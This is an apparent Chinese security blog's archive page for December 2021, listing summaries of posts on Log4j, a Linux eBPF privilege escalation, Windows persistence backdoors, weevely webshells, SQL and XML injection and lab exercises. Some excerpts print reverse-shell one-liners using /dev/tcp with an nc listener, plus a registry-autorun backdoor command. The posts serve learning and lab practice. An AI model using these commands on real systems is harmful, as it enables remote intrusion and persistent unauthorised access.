12 2021 档案

摘要:关于Log4j 半个月前,Apache的Log4j漏洞爆出,甚至一度被认为是一个核弹级的0 day漏洞。今天来复现一下该漏洞。 Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信 阅读全文
posted @ 2021-12-26 14:27 小小小怪将军 阅读(792) 评论(0) 推荐(0) 编辑
摘要:前言 Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题。 攻击者(普通用户)可以利用该漏洞进行提权攻击,获取root权限,危害极大。 目前,主要是Debian 阅读全文
posted @ 2021-12-20 10:11 小小小怪将军 阅读(838) 评论(0) 推荐(0) 编辑
摘要:网络爬虫 通用搜索引擎的处理对象是互联网网页,目前网页数量以百亿计,搜索引擎的网络爬虫能够高效地将海量的网页数据传下载到本地,在本地 形成互联网网页的镜像备份。它是搜索引擎系统中很关键也很基础的构件。 1. 网络爬虫本质就是浏览器http请求。 浏览器和网络爬虫是两种不同的网络客户端,都以相同的方式 阅读全文
posted @ 2021-12-17 23:14 小小小怪将军 阅读(505) 评论(0) 推荐(0) 编辑
摘要:网络爬虫 之前用python做过一些爬虫,爬取电影信息,学校管理系统个人信息之类的,在墨者上看到搜索引擎也有爬虫?想想也是,理解起来很简单,一款搜索引擎,要收录的信息太多了,肯定不会靠人工收录,那就会有爬虫脚本,去收录信息,放到搜索引擎的数据库里,之后搜索才会出来东西。 直接上靶场地址:https: 阅读全文
posted @ 2021-12-16 11:32 小小小怪将军 阅读(170) 评论(0) 推荐(0) 编辑
摘要:技巧总结 1.添加影子用户 2.在注册表中添加自启动后门 3.通过计划任务添加后门 4.隐藏技巧 具体操作 1.添加影子用户 可见Windows影子用户创建与3389连接 2.在注册表中添加自启动后门 win+r运行输入regedit,进入注册表编辑器 通过 reg add "HKEY_CURREN 阅读全文
posted @ 2021-12-11 21:12 小小小怪将军 阅读(206) 评论(0) 推荐(0) 编辑
摘要:前言 Linux下,一条bash命令就可以反弹出shell。之前不求甚解的复现,突然有了一个疑问,为什么这样就能实现shell反弹?又重新学习了一下bash,这是一篇关于bash反弹原理的介绍。 反弹shell命令如下 受害者: bash -i >& /dev/tcp/ip/port 0>&1 攻击 阅读全文
posted @ 2021-12-10 23:10 小小小怪将军 阅读(3090) 评论(0) 推荐(0) 编辑
摘要:kali使用OpenSSL加密反弹shell 通过bash普通反弹shell kali开启监听 nc -lvp 3333 在受害机上反弹交互式shell bash -i &>/dev/tcp/192.168.80.131/3333 <&1 成功反弹了ubuntu的shell,打开wireshark监 阅读全文
posted @ 2021-12-09 14:46 小小小怪将军 阅读(598) 评论(0) 推荐(0) 编辑
摘要:前言 在目前的后门生成工具中,最常用的就是MSF和CobaltStrike了。weevely人称Linux中的菜刀,相比于前两者,最主要的是操作比较简单,接下来简单介绍一下。 基本用法 [+] Run terminal or command on the target //连接后门 weevely 阅读全文
posted @ 2021-12-09 11:39 小小小怪将军 阅读(708) 评论(0) 推荐(0) 编辑
摘要:命令执行漏洞 1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。 2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 3、更常见的命令执行漏洞是发生在各种Web组件,包括W 阅读全文
posted @ 2021-12-06 12:25 小小小怪将军 阅读(317) 评论(0) 推荐(0) 编辑
摘要:phpMyAdmin后台文件包含分析溯源 前言 文件包含漏洞是什么? 简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 直接上题,靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFW 阅读全文
posted @ 2021-12-05 20:37 小小小怪将军 阅读(403) 评论(0) 推荐(0) 编辑
摘要:最近就继续更新刷题吧。 靶场地址:https://www.mozhe.cn/bug/detail/VFduTDlNaXFZMmJjY1Mzdnd1THFhQT09bW96aGUmozhe 打开靶场 在这之前确实不懂XML该怎么注入,和报错注入里面的updaxml弄混了,在做题之前,先简单了解一下XM 阅读全文
posted @ 2021-12-05 19:42 小小小怪将军 阅读(174) 评论(0) 推荐(0) 编辑
摘要:记第一次CTF心得,第一届东软杯CTF 从周四组队报名,到周五参加预练,对CTF都是处于比较懵的状态,周四的预练倒是个第三名。到今天,大意了,今天伤亡惨重。 上午只做出了两道题,当时总共大概15道左右,心态就没了,打算放弃了都。下午回来又打开来试了试,有了不错的收获。 一个个来说吧。 WEB web 阅读全文
posted @ 2021-12-04 17:39 小小小怪将军 阅读(259) 评论(0) 推荐(0) 编辑
摘要:墨者学院-SQL注入实战-MySQL 前言 最近在研究一些其他有趣的技术,发现很久不更靶场的题目了。 今天做一个SQL注入的题,靶场地址如下:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe 正文 阅读全文
posted @ 2021-12-03 17:18 小小小怪将军 阅读(175) 评论(0) 推荐(0) 编辑
摘要:识别验证码的暴力破解 前言 对于暴力破解,理论上来说,只要字典足够强大,暴力破解一定可以登录成功,但现在的登陆往往还伴随着验证码,比如 所以如何识别验证码,才是最重要的 解决方法 利用BurpSuite插件captcha-killer:https://github.com/c0ny1/captcha 阅读全文
posted @ 2021-12-02 21:58 小小小怪将军 阅读(1429) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示